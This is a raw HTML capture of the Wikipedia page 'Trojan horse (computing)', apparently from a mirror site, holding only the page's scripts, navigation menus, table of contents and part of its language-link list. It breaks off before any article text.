CINXE.COM

Trojan horse (computing) - Wikipedia

<!DOCTYPE html> <html class="client-nojs vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-feature-night-mode-enabled skin-theme-clientpref-day vector-toc-available" lang="en" dir="ltr"> <head> <meta charset="UTF-8"> <title>Trojan horse (computing) - Wikipedia</title> <script>(function(){var className="client-js vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-sticky-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-feature-night-mode-enabled skin-theme-clientpref-day vector-toc-available";var cookie=document.cookie.match(/(?:^|; )enwikimwclientpreferences=([^;]+)/);if(cookie){cookie[1].split('%2C').forEach(function(pref){className=className.replace(new RegExp('(^| )'+pref.replace(/-clientpref-\w+$|[^\w-]+/g,'')+'-clientpref-\\w+( |$)'),'$1'+pref+'$2');});}document.documentElement.className=className;}());RLCONF={"wgBreakFrames":false,"wgSeparatorTransformTable":["",""],"wgDigitTransformTable":["",""],"wgDefaultDateFormat":"dmy", "wgMonthNames":["","January","February","March","April","May","June","July","August","September","October","November","December"],"wgRequestId":"b8ff3c16-ddf1-41f2-a061-869cd658b0bc","wgCanonicalNamespace":"","wgCanonicalSpecialPageName":false,"wgNamespaceNumber":0,"wgPageName":"Trojan_horse_(computing)","wgTitle":"Trojan horse (computing)","wgCurRevisionId":1259654683,"wgRevisionId":1259654683,"wgArticleId":30056,"wgIsArticle":true,"wgIsRedirect":false,"wgAction":"view","wgUserName":null,"wgUserGroups":["*"],"wgCategories":["CS1 maint: unfit URL","Articles with short description","Short description is different from Wikidata","Use mdy dates from May 2018","Pages displaying short descriptions of redirect targets via Module:Annotated link","Commons category link is on Wikidata","Trojan horses","Social engineering (security)","Spyware","Cyberwarfare","Security breaches"],"wgPageViewLanguage":"en","wgPageContentLanguage":"en","wgPageContentModel":"wikitext","wgRelevantPageName": "Trojan_horse_(computing)","wgRelevantArticleId":30056,"wgIsProbablyEditable":true,"wgRelevantPageIsProbablyEditable":true,"wgRestrictionEdit":[],"wgRestrictionMove":[],"wgNoticeProject":"wikipedia","wgCiteReferencePreviewsActive":false,"wgFlaggedRevsParams":{"tags":{"status":{"levels":1}}},"wgMediaViewerOnClick":true,"wgMediaViewerEnabledByDefault":true,"wgPopupsFlags":0,"wgVisualEditor":{"pageLanguageCode":"en","pageLanguageDir":"ltr","pageVariantFallbacks":"en"},"wgMFDisplayWikibaseDescriptions":{"search":true,"watchlist":true,"tagline":false,"nearby":true},"wgWMESchemaEditAttemptStepOversample":false,"wgWMEPageLength":20000,"wgRelatedArticlesCompat":[],"wgCentralAuthMobileDomain":false,"wgEditSubmitButtonLabelPublish":true,"wgULSPosition":"interlanguage","wgULSisCompactLinksEnabled":false,"wgVector2022LanguageInHeader":true,"wgULSisLanguageSelectorEmpty":false,"wgWikibaseItemId":"Q14639","wgCheckUserClientHintsHeadersJsApi":["brands","architecture","bitness","fullVersionList", "mobile","model","platform","platformVersion"],"GEHomepageSuggestedEditsEnableTopics":true,"wgGETopicsMatchModeEnabled":false,"wgGEStructuredTaskRejectionReasonTextInputEnabled":false,"wgGELevelingUpEnabledForUser":false};RLSTATE={"ext.globalCssJs.user.styles":"ready","site.styles":"ready","user.styles":"ready","ext.globalCssJs.user":"ready","user":"ready","user.options":"loading","ext.cite.styles":"ready","ext.pygments":"ready","skins.vector.search.codex.styles":"ready","skins.vector.styles":"ready","skins.vector.icons":"ready","jquery.makeCollapsible.styles":"ready","ext.wikimediamessages.styles":"ready","ext.visualEditor.desktopArticleTarget.noscript":"ready","ext.uls.interlanguage":"ready","wikibase.client.init":"ready","ext.wikimediaBadges":"ready"};RLPAGEMODULES=["ext.cite.ux-enhancements","ext.pygments.view","site","mediawiki.page.ready","jquery.makeCollapsible","mediawiki.toc","skins.vector.js","ext.centralNotice.geoIP","ext.centralNotice.startUp","ext.gadget.ReferenceTooltips" ,"ext.gadget.switcher","ext.urlShortener.toolbar","ext.centralauth.centralautologin","mmv.bootstrap","ext.popups","ext.visualEditor.desktopArticleTarget.init","ext.visualEditor.targetLoader","ext.echo.centralauth","ext.eventLogging","ext.wikimediaEvents","ext.navigationTiming","ext.uls.interface","ext.cx.eventlogging.campaigns","ext.cx.uls.quick.actions","wikibase.client.vector-2022","ext.checkUser.clientHints","ext.quicksurveys.init","ext.growthExperiments.SuggestedEditSession","wikibase.sidebar.tracking"];</script> <script>(RLQ=window.RLQ||[]).push(function(){mw.loader.impl(function(){return["user.options@12s5i",function($,jQuery,require,module){mw.user.tokens.set({"patrolToken":"+\\","watchToken":"+\\","csrfToken":"+\\"}); }];});});</script> <link rel="stylesheet" href="/w/load.php?lang=en&amp;modules=ext.cite.styles%7Cext.pygments%2CwikimediaBadges%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediamessages.styles%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"> <script async="" src="/w/load.php?lang=en&amp;modules=startup&amp;only=scripts&amp;raw=1&amp;skin=vector-2022"></script> <meta name="ResourceLoaderDynamicStyles" content=""> <link rel="stylesheet" href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"> <meta name="generator" content="MediaWiki 1.44.0-wmf.4"> <meta name="referrer" content="origin"> <meta name="referrer" content="origin-when-cross-origin"> <meta name="robots" content="max-image-preview:standard"> <meta name="format-detection" content="telephone=no"> <meta name="viewport" content="width=1120"> <meta property="og:title" content="Trojan horse (computing) - Wikipedia"> <meta property="og:type" content="website"> <link rel="preconnect" href="//upload.wikimedia.org"> <link rel="alternate" media="only screen and (max-width: 640px)" href="//en.m.wikipedia.org/wiki/Trojan_horse_(computing)"> <link rel="alternate" type="application/x-wiki" title="Edit this page" href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit"> <link rel="apple-touch-icon" href="/static/apple-touch/wikipedia.png"> <link rel="icon" href="/static/favicon/wikipedia.ico"> <link rel="search" type="application/opensearchdescription+xml" href="/w/rest.php/v1/search" title="Wikipedia (en)"> <link rel="EditURI" type="application/rsd+xml" href="//en.wikipedia.org/w/api.php?action=rsd"> <link rel="canonical" href="https://en.wikipedia.org/wiki/Trojan_horse_(computing)"> <link rel="license" href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"> <link rel="alternate" type="application/atom+xml" title="Wikipedia Atom feed" href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"> <link rel="dns-prefetch" href="//meta.wikimedia.org" /> <link rel="dns-prefetch" href="//login.wikimedia.org"> </head> <body class="skin--responsive skin-vector skin-vector-search-vue mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject mw-editable page-Trojan_horse_computing rootpage-Trojan_horse_computing skin-vector-2022 action-view"><a class="mw-jump-link" href="#bodyContent">Jump to content</a> <div class="vector-header-container"> <header class="vector-header mw-header"> <div class="vector-header-start"> <nav class="vector-main-menu-landmark" aria-label="Site"> <div id="vector-main-menu-dropdown" class="vector-dropdown vector-main-menu-dropdown vector-button-flush-left vector-button-flush-right" > <input type="checkbox" id="vector-main-menu-dropdown-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-main-menu-dropdown" class="vector-dropdown-checkbox " aria-label="Main menu" > <label id="vector-main-menu-dropdown-label" for="vector-main-menu-dropdown-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--icon-only " aria-hidden="true" ><span class="vector-icon mw-ui-icon-menu mw-ui-icon-wikimedia-menu"></span> <span class="vector-dropdown-label-text">Main menu</span> </label> <div class="vector-dropdown-content"> <div id="vector-main-menu-unpinned-container" class="vector-unpinned-container"> <div id="vector-main-menu" class="vector-main-menu vector-pinnable-element"> <div class="vector-pinnable-header vector-main-menu-pinnable-header vector-pinnable-header-unpinned" data-feature-name="main-menu-pinned" data-pinnable-element-id="vector-main-menu" data-pinned-container-id="vector-main-menu-pinned-container" data-unpinned-container-id="vector-main-menu-unpinned-container" > <div class="vector-pinnable-header-label">Main menu</div> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-pin-button" data-event-name="pinnable-header.vector-main-menu.pin">move to sidebar</button> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-unpin-button" data-event-name="pinnable-header.vector-main-menu.unpin">hide</button> </div> <div id="p-navigation" class="vector-menu mw-portlet mw-portlet-navigation" > <div class="vector-menu-heading"> Navigation </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="n-mainpage-description" class="mw-list-item"><a href="/wiki/Main_Page" title="Visit the main page [z]" accesskey="z"><span>Main page</span></a></li><li id="n-contents" class="mw-list-item"><a href="/wiki/Wikipedia:Contents" title="Guides to browsing Wikipedia"><span>Contents</span></a></li><li id="n-currentevents" class="mw-list-item"><a href="/wiki/Portal:Current_events" title="Articles related to current events"><span>Current events</span></a></li><li id="n-randompage" class="mw-list-item"><a href="/wiki/Special:Random" title="Visit a randomly selected article [x]" accesskey="x"><span>Random article</span></a></li><li id="n-aboutsite" class="mw-list-item"><a href="/wiki/Wikipedia:About" title="Learn about Wikipedia and how it works"><span>About Wikipedia</span></a></li><li id="n-contactpage" class="mw-list-item"><a href="//en.wikipedia.org/wiki/Wikipedia:Contact_us" title="How to contact Wikipedia"><span>Contact us</span></a></li> </ul> </div> </div> <div id="p-interaction" class="vector-menu mw-portlet mw-portlet-interaction" > <div class="vector-menu-heading"> Contribute </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="n-help" class="mw-list-item"><a href="/wiki/Help:Contents" title="Guidance on how to use and edit Wikipedia"><span>Help</span></a></li><li id="n-introduction" class="mw-list-item"><a href="/wiki/Help:Introduction" title="Learn how to edit Wikipedia"><span>Learn to edit</span></a></li><li id="n-portal" class="mw-list-item"><a href="/wiki/Wikipedia:Community_portal" title="The hub for editors"><span>Community portal</span></a></li><li id="n-recentchanges" class="mw-list-item"><a href="/wiki/Special:RecentChanges" title="A list of recent changes to Wikipedia [r]" accesskey="r"><span>Recent changes</span></a></li><li id="n-upload" class="mw-list-item"><a href="/wiki/Wikipedia:File_upload_wizard" title="Add images or other media for use on Wikipedia"><span>Upload file</span></a></li> </ul> </div> </div> </div> </div> </div> </div> </nav> <a href="/wiki/Main_Page" class="mw-logo"> <img class="mw-logo-icon" src="/static/images/icons/wikipedia.png" alt="" aria-hidden="true" height="50" width="50"> <span class="mw-logo-container skin-invert"> <img class="mw-logo-wordmark" alt="Wikipedia" src="/static/images/mobile/copyright/wikipedia-wordmark-en.svg" style="width: 7.5em; height: 1.125em;"> <img class="mw-logo-tagline" alt="The Free Encyclopedia" src="/static/images/mobile/copyright/wikipedia-tagline-en.svg" width="117" height="13" style="width: 7.3125em; height: 0.8125em;"> </span> </a> </div> <div class="vector-header-end"> <div id="p-search" role="search" class="vector-search-box-vue vector-search-box-collapses vector-search-box-show-thumbnail vector-search-box-auto-expand-width vector-search-box"> <a href="/wiki/Special:Search" class="cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--icon-only search-toggle" title="Search Wikipedia [f]" accesskey="f"><span class="vector-icon mw-ui-icon-search mw-ui-icon-wikimedia-search"></span> <span>Search</span> </a> <div class="vector-typeahead-search-container"> <div class="cdx-typeahead-search cdx-typeahead-search--show-thumbnail cdx-typeahead-search--auto-expand-width"> <form action="/w/index.php" id="searchform" class="cdx-search-input cdx-search-input--has-end-button"> <div id="simpleSearch" class="cdx-search-input__input-wrapper" data-search-loc="header-moved"> <div class="cdx-text-input cdx-text-input--has-start-icon"> <input class="cdx-text-input__input" type="search" name="search" placeholder="Search Wikipedia" aria-label="Search Wikipedia" autocapitalize="sentences" title="Search Wikipedia [f]" accesskey="f" id="searchInput" > <span class="cdx-text-input__icon cdx-text-input__start-icon"></span> </div> <input type="hidden" name="title" value="Special:Search"> </div> <button class="cdx-button cdx-search-input__end-button">Search</button> </form> </div> </div> </div> <nav class="vector-user-links vector-user-links-wide" aria-label="Personal tools"> <div class="vector-user-links-main"> <div id="p-vector-user-menu-preferences" class="vector-menu mw-portlet emptyPortlet" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> </ul> </div> </div> <div id="p-vector-user-menu-userpage" class="vector-menu mw-portlet emptyPortlet" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> </ul> </div> </div> <nav class="vector-appearance-landmark" aria-label="Appearance"> <div id="vector-appearance-dropdown" class="vector-dropdown " title="Change the appearance of the page&#039;s font size, width, and color" > <input type="checkbox" id="vector-appearance-dropdown-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-appearance-dropdown" class="vector-dropdown-checkbox " aria-label="Appearance" > <label id="vector-appearance-dropdown-label" for="vector-appearance-dropdown-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--icon-only " aria-hidden="true" ><span class="vector-icon mw-ui-icon-appearance mw-ui-icon-wikimedia-appearance"></span> <span class="vector-dropdown-label-text">Appearance</span> </label> <div class="vector-dropdown-content"> <div id="vector-appearance-unpinned-container" class="vector-unpinned-container"> </div> </div> </div> </nav> <div id="p-vector-user-menu-notifications" class="vector-menu mw-portlet emptyPortlet" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> </ul> </div> </div> <div id="p-vector-user-menu-overflow" class="vector-menu mw-portlet" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="pt-sitesupport-2" class="user-links-collapsible-item mw-list-item user-links-collapsible-item"><a data-mw="interface" href="https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&amp;utm_medium=sidebar&amp;utm_campaign=C13_en.wikipedia.org&amp;uselang=en" class=""><span>Donate</span></a> </li> <li id="pt-createaccount-2" class="user-links-collapsible-item mw-list-item user-links-collapsible-item"><a data-mw="interface" href="/w/index.php?title=Special:CreateAccount&amp;returnto=Trojan+horse+%28computing%29" title="You are encouraged to create an account and log in; however, it is not mandatory" class=""><span>Create account</span></a> </li> <li id="pt-login-2" class="user-links-collapsible-item mw-list-item user-links-collapsible-item"><a data-mw="interface" href="/w/index.php?title=Special:UserLogin&amp;returnto=Trojan+horse+%28computing%29" title="You&#039;re encouraged to log in; however, it&#039;s not mandatory. [o]" accesskey="o" class=""><span>Log in</span></a> </li> </ul> </div> </div> </div> <div id="vector-user-links-dropdown" class="vector-dropdown vector-user-menu vector-button-flush-right vector-user-menu-logged-out" title="Log in and more options" > <input type="checkbox" id="vector-user-links-dropdown-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-user-links-dropdown" class="vector-dropdown-checkbox " aria-label="Personal tools" > <label id="vector-user-links-dropdown-label" for="vector-user-links-dropdown-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--icon-only " aria-hidden="true" ><span class="vector-icon mw-ui-icon-ellipsis mw-ui-icon-wikimedia-ellipsis"></span> <span class="vector-dropdown-label-text">Personal tools</span> </label> <div class="vector-dropdown-content"> <div id="p-personal" class="vector-menu mw-portlet mw-portlet-personal user-links-collapsible-item" title="User menu" > <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="pt-sitesupport" class="user-links-collapsible-item mw-list-item"><a href="https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&amp;utm_medium=sidebar&amp;utm_campaign=C13_en.wikipedia.org&amp;uselang=en"><span>Donate</span></a></li><li id="pt-createaccount" class="user-links-collapsible-item mw-list-item"><a href="/w/index.php?title=Special:CreateAccount&amp;returnto=Trojan+horse+%28computing%29" title="You are encouraged to create an account and log in; however, it is not mandatory"><span class="vector-icon mw-ui-icon-userAdd mw-ui-icon-wikimedia-userAdd"></span> <span>Create account</span></a></li><li id="pt-login" class="user-links-collapsible-item mw-list-item"><a href="/w/index.php?title=Special:UserLogin&amp;returnto=Trojan+horse+%28computing%29" title="You&#039;re encouraged to log in; however, it&#039;s not mandatory. [o]" accesskey="o"><span class="vector-icon mw-ui-icon-logIn mw-ui-icon-wikimedia-logIn"></span> <span>Log in</span></a></li> </ul> </div> </div> <div id="p-user-menu-anon-editor" class="vector-menu mw-portlet mw-portlet-user-menu-anon-editor" > <div class="vector-menu-heading"> Pages for logged out editors <a href="/wiki/Help:Introduction" aria-label="Learn more about editing"><span>learn more</span></a> </div> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li id="pt-anoncontribs" class="mw-list-item"><a href="/wiki/Special:MyContributions" title="A list of edits made from this IP address [y]" accesskey="y"><span>Contributions</span></a></li><li id="pt-anontalk" class="mw-list-item"><a href="/wiki/Special:MyTalk" title="Discussion about edits from this IP address [n]" accesskey="n"><span>Talk</span></a></li> </ul> </div> </div> </div> </div> </nav> </div> </header> </div> <div class="mw-page-container"> <div class="mw-page-container-inner"> <div class="vector-sitenotice-container"> <div id="siteNotice"><!-- CentralNotice --></div> </div> <div class="vector-column-start"> <div class="vector-main-menu-container"> <div id="mw-navigation"> <nav id="mw-panel" class="vector-main-menu-landmark" aria-label="Site"> <div id="vector-main-menu-pinned-container" class="vector-pinned-container"> </div> </nav> </div> </div> <div class="vector-sticky-pinned-container"> <nav id="mw-panel-toc" aria-label="Contents" data-event-name="ui.sidebar-toc" class="mw-table-of-contents-container vector-toc-landmark"> <div id="vector-toc-pinned-container" class="vector-pinned-container"> <div id="vector-toc" class="vector-toc vector-pinnable-element"> <div class="vector-pinnable-header vector-toc-pinnable-header vector-pinnable-header-pinned" data-feature-name="toc-pinned" data-pinnable-element-id="vector-toc" > <h2 class="vector-pinnable-header-label">Contents</h2> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-pin-button" data-event-name="pinnable-header.vector-toc.pin">move to sidebar</button> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-unpin-button" data-event-name="pinnable-header.vector-toc.unpin">hide</button> </div> <ul class="vector-toc-contents" id="mw-panel-toc-list"> <li id="toc-mw-content-text" class="vector-toc-list-item vector-toc-level-1"> <a href="#" class="vector-toc-link"> <div class="vector-toc-text">(Top)</div> </a> </li> <li id="toc-Use_of_the_term" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Use_of_the_term"> <div class="vector-toc-text"> <span class="vector-toc-numb">1</span> <span>Use of the term</span> </div> </a> <ul id="toc-Use_of_the_term-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Behavior" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Behavior"> <div class="vector-toc-text"> <span class="vector-toc-numb">2</span> <span>Behavior</span> </div> </a> <ul id="toc-Behavior-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Linux_sudo_example" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Linux_sudo_example"> <div class="vector-toc-text"> <span class="vector-toc-numb">3</span> <span>Linux sudo example</span> </div> </a> <ul id="toc-Linux_sudo_example-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Linux_ls_example" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Linux_ls_example"> <div class="vector-toc-text"> <span class="vector-toc-numb">4</span> <span>Linux ls example</span> </div> </a> <ul id="toc-Linux_ls_example-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Notable_examples" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Notable_examples"> <div class="vector-toc-text"> <span class="vector-toc-numb">5</span> <span>Notable examples</span> </div> </a> <button aria-controls="toc-Notable_examples-sublist" class="cdx-button cdx-button--weight-quiet cdx-button--icon-only vector-toc-toggle"> <span class="vector-icon mw-ui-icon-wikimedia-expand"></span> <span>Toggle Notable examples subsection</span> </button> <ul id="toc-Notable_examples-sublist" class="vector-toc-list"> <li id="toc-Private_and_governmental" class="vector-toc-list-item vector-toc-level-2"> <a class="vector-toc-link" href="#Private_and_governmental"> <div class="vector-toc-text"> <span class="vector-toc-numb">5.1</span> <span>Private and governmental</span> </div> </a> <ul id="toc-Private_and_governmental-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Publicly_available" class="vector-toc-list-item vector-toc-level-2"> <a class="vector-toc-link" href="#Publicly_available"> <div class="vector-toc-text"> <span class="vector-toc-numb">5.2</span> <span>Publicly available</span> </div> </a> <ul id="toc-Publicly_available-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Detected_by_security_researchers" class="vector-toc-list-item vector-toc-level-2"> <a class="vector-toc-link" href="#Detected_by_security_researchers"> <div class="vector-toc-text"> <span class="vector-toc-numb">5.3</span> <span>Detected by security researchers</span> </div> </a> <ul id="toc-Detected_by_security_researchers-sublist" class="vector-toc-list"> </ul> </li> </ul> </li> <li id="toc-Capitalization" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Capitalization"> <div class="vector-toc-text"> <span class="vector-toc-numb">6</span> <span>Capitalization</span> </div> </a> <ul id="toc-Capitalization-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-See_also" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#See_also"> <div class="vector-toc-text"> <span class="vector-toc-numb">7</span> <span>See also</span> </div> </a> <ul id="toc-See_also-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-References" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#References"> <div class="vector-toc-text"> <span class="vector-toc-numb">8</span> <span>References</span> </div> </a> <ul id="toc-References-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-Notes" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#Notes"> <div class="vector-toc-text"> <span class="vector-toc-numb">9</span> <span>Notes</span> </div> </a> <ul id="toc-Notes-sublist" class="vector-toc-list"> </ul> </li> <li id="toc-External_links" class="vector-toc-list-item vector-toc-level-1 vector-toc-list-item-expanded"> <a class="vector-toc-link" href="#External_links"> <div class="vector-toc-text"> <span class="vector-toc-numb">10</span> <span>External links</span> </div> </a> <ul id="toc-External_links-sublist" class="vector-toc-list"> </ul> </li> </ul> </div> </div> </nav> </div> </div> <div class="mw-content-container"> <main id="content" class="mw-body"> <header class="mw-body-header vector-page-titlebar"> <nav aria-label="Contents" class="vector-toc-landmark"> <div id="vector-page-titlebar-toc" class="vector-dropdown vector-page-titlebar-toc vector-button-flush-left" > <input type="checkbox" id="vector-page-titlebar-toc-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-vector-page-titlebar-toc" class="vector-dropdown-checkbox " aria-label="Toggle the table of contents" > <label id="vector-page-titlebar-toc-label" for="vector-page-titlebar-toc-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--icon-only " aria-hidden="true" ><span class="vector-icon mw-ui-icon-listBullet mw-ui-icon-wikimedia-listBullet"></span> <span class="vector-dropdown-label-text">Toggle the table of contents</span> </label> <div class="vector-dropdown-content"> <div id="vector-page-titlebar-toc-unpinned-container" class="vector-unpinned-container"> </div> </div> </div> </nav> <h1 id="firstHeading" class="firstHeading mw-first-heading"><span class="mw-page-title-main">Trojan horse (computing)</span></h1> <div id="p-lang-btn" class="vector-dropdown mw-portlet mw-portlet-lang" > <input type="checkbox" id="p-lang-btn-checkbox" role="button" aria-haspopup="true" data-event-name="ui.dropdown-p-lang-btn" class="vector-dropdown-checkbox mw-interlanguage-selector" aria-label="Go to an article in another language. Available in 66 languages" > <label id="p-lang-btn-label" for="p-lang-btn-checkbox" class="vector-dropdown-label cdx-button cdx-button--fake-button cdx-button--fake-button--enabled cdx-button--weight-quiet cdx-button--action-progressive mw-portlet-lang-heading-66" aria-hidden="true" ><span class="vector-icon mw-ui-icon-language-progressive mw-ui-icon-wikimedia-language-progressive"></span> <span class="vector-dropdown-label-text">66 languages</span> </label> <div class="vector-dropdown-content"> <div class="vector-menu-content"> <ul class="vector-menu-content-list"> <li class="interlanguage-link interwiki-af mw-list-item"><a href="https://af.wikipedia.org/wiki/Trojaanse_perd_(rekenaars)" title="Trojaanse perd (rekenaars) – Afrikaans" lang="af" hreflang="af" data-title="Trojaanse perd (rekenaars)" data-language-autonym="Afrikaans" data-language-local-name="Afrikaans" class="interlanguage-link-target"><span>Afrikaans</span></a></li><li class="interlanguage-link interwiki-ar mw-list-item"><a href="https://ar.wikipedia.org/wiki/%D8%AD%D8%B5%D8%A7%D9%86_%D8%B7%D8%B1%D9%88%D8%A7%D8%AF%D8%A9_(%D8%AD%D8%A7%D8%B3%D9%88%D8%A8)" title="حصان طروادة (حاسوب) – Arabic" lang="ar" hreflang="ar" data-title="حصان طروادة (حاسوب)" data-language-autonym="العربية" data-language-local-name="Arabic" class="interlanguage-link-target"><span>العربية</span></a></li><li class="interlanguage-link interwiki-az mw-list-item"><a href="https://az.wikipedia.org/wiki/Troyan_proqram%C4%B1" title="Troyan proqramı – Azerbaijani" lang="az" hreflang="az" data-title="Troyan proqramı" data-language-autonym="Azərbaycanca" data-language-local-name="Azerbaijani" class="interlanguage-link-target"><span>Azərbaycanca</span></a></li><li class="interlanguage-link interwiki-zh-min-nan mw-list-item"><a href="https://zh-min-nan.wikipedia.org/wiki/Chh%C3%A2-b%C3%A9_th%C3%AAng-sek" title="Chhâ-bé thêng-sek – Minnan" lang="nan" hreflang="nan" data-title="Chhâ-bé thêng-sek" data-language-autonym="閩南語 / Bân-lâm-gú" data-language-local-name="Minnan" class="interlanguage-link-target"><span>閩南語 / Bân-lâm-gú</span></a></li><li class="interlanguage-link interwiki-bg mw-list-item"><a href="https://bg.wikipedia.org/wiki/%D0%A2%D1%80%D0%BE%D1%8F%D0%BD%D1%81%D0%BA%D0%B8_%D0%BA%D0%BE%D0%BD_(%D0%BA%D0%BE%D0%BC%D0%BF%D1%8E%D1%82%D1%80%D0%B8)" title="Троянски кон (компютри) – Bulgarian" lang="bg" hreflang="bg" data-title="Троянски кон (компютри)" data-language-autonym="Български" data-language-local-name="Bulgarian" class="interlanguage-link-target"><span>Български</span></a></li><li class="interlanguage-link interwiki-bar mw-list-item"><a href="https://bar.wikipedia.org/wiki/Trojana" title="Trojana – Bavarian" lang="bar" hreflang="bar" data-title="Trojana" data-language-autonym="Boarisch" data-language-local-name="Bavarian" class="interlanguage-link-target"><span>Boarisch</span></a></li><li class="interlanguage-link interwiki-bs mw-list-item"><a href="https://bs.wikipedia.org/wiki/Trojanski_konj_(ra%C4%8Dunarstvo)" title="Trojanski konj (računarstvo) – Bosnian" lang="bs" hreflang="bs" data-title="Trojanski konj (računarstvo)" data-language-autonym="Bosanski" data-language-local-name="Bosnian" class="interlanguage-link-target"><span>Bosanski</span></a></li><li class="interlanguage-link interwiki-ca mw-list-item"><a href="https://ca.wikipedia.org/wiki/Troi%C3%A0_(inform%C3%A0tica)" title="Troià (informàtica) – Catalan" lang="ca" hreflang="ca" data-title="Troià (informàtica)" data-language-autonym="Català" data-language-local-name="Catalan" class="interlanguage-link-target"><span>Català</span></a></li><li class="interlanguage-link interwiki-cs mw-list-item"><a href="https://cs.wikipedia.org/wiki/Trojsk%C3%BD_k%C5%AF%C5%88_(program)" title="Trojský kůň (program) – Czech" lang="cs" hreflang="cs" data-title="Trojský kůň (program)" data-language-autonym="Čeština" data-language-local-name="Czech" class="interlanguage-link-target"><span>Čeština</span></a></li><li class="interlanguage-link interwiki-da mw-list-item"><a href="https://da.wikipedia.org/wiki/Trojansk_hest" title="Trojansk hest – Danish" lang="da" hreflang="da" data-title="Trojansk hest" data-language-autonym="Dansk" data-language-local-name="Danish" class="interlanguage-link-target"><span>Dansk</span></a></li><li class="interlanguage-link interwiki-de mw-list-item"><a href="https://de.wikipedia.org/wiki/Trojanisches_Pferd_(Computerprogramm)" title="Trojanisches Pferd (Computerprogramm) – German" lang="de" hreflang="de" data-title="Trojanisches Pferd (Computerprogramm)" data-language-autonym="Deutsch" data-language-local-name="German" class="interlanguage-link-target"><span>Deutsch</span></a></li><li class="interlanguage-link interwiki-et mw-list-item"><a href="https://et.wikipedia.org/wiki/Trooja_hobune_(informaatika)" title="Trooja hobune (informaatika) – Estonian" lang="et" hreflang="et" data-title="Trooja hobune (informaatika)" data-language-autonym="Eesti" data-language-local-name="Estonian" class="interlanguage-link-target"><span>Eesti</span></a></li><li class="interlanguage-link interwiki-el mw-list-item"><a href="https://el.wikipedia.org/wiki/%CE%94%CE%BF%CF%8D%CF%81%CE%B5%CE%B9%CE%BF%CF%82_%CE%8A%CF%80%CF%80%CE%BF%CF%82_(%CF%85%CF%80%CE%BF%CE%BB%CE%BF%CE%B3%CE%B9%CF%83%CF%84%CE%AD%CF%82)" title="Δούρειος Ίππος (υπολογιστές) – Greek" lang="el" hreflang="el" data-title="Δούρειος Ίππος (υπολογιστές)" data-language-autonym="Ελληνικά" data-language-local-name="Greek" class="interlanguage-link-target"><span>Ελληνικά</span></a></li><li class="interlanguage-link interwiki-es mw-list-item"><a 